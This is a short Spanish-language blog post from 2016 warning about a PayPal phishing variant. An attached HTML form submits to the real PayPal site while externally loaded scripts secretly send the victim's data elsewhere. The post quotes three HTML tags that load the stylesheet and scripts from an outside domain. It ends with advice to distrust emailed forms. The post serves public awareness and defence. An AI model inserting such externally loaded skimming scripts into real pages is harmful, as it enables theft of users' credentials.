Web BizarroWeb Bizarro

Suscríbete a nuestro Newsletter

X

Únete a nuestra lista de correos para recibir semanalmente actualizaciones de nuestro contenido.

Una nueva y peligrosa forma de phishing

Una nueva y peligrosa forma de phishing 21.JUN.16

Alvaro José Rios Ch
Fundador WebBizarro

El phishing sigue siendo una de las herramientas preferidas de los cibercriminales para robar datos de usuarios incautos y generalmente se trata de un correo electrónico donde generalmente se dice que hay un problema con la plataforma y que debe colocar todos sus datos nuevamente, generalmente los datos se envían a un servidor externo y luego se le dice al usuario que hay un problema.

Sin embargo se ha visto una nueva modalidad recientemente que cumple con todos los parámetros anteriores pero el formulario no envía a un servidor externo sino al sitio oficial de paypal. El formulario viene en un HTML adjunto al correo electrónico y si revisas las url todas parecen correctas, sin embargo 3 archivos se encargan de todo el robo de datos.

<link rel=”stylesheet” href=”http://www.egypt-trips.co/wp-admin/includes/New/css/default.css” />
<script type=”text/javascript” src=”http://www.egypt-trips.co/wp-admin/includes/New/js/jquery.ba-hashchange.min.js“></script>
<script type=”text/javascript” src=”http://www.egypt-trips.co/wp-admin/includes/New/js/default.js“></script>

Estos archivos hacen el envío de datos por debajo a un servidor externo y luego redireccionan al servidor de paypal. Como siempre la mejor forma es siempre buscar fuentes oficiales. Las empresas no piden datos por correo electrónico y no envían formularios adjuntos a los correos, así que ten mucho cuidado porque aunque esta versión del ataque ha sido dada de baja es muy posible que alguien intente hacer algo similar luego.

Más información: https://myonlinesecurity.co.uk/very-unusual-paypal-phishing-attack/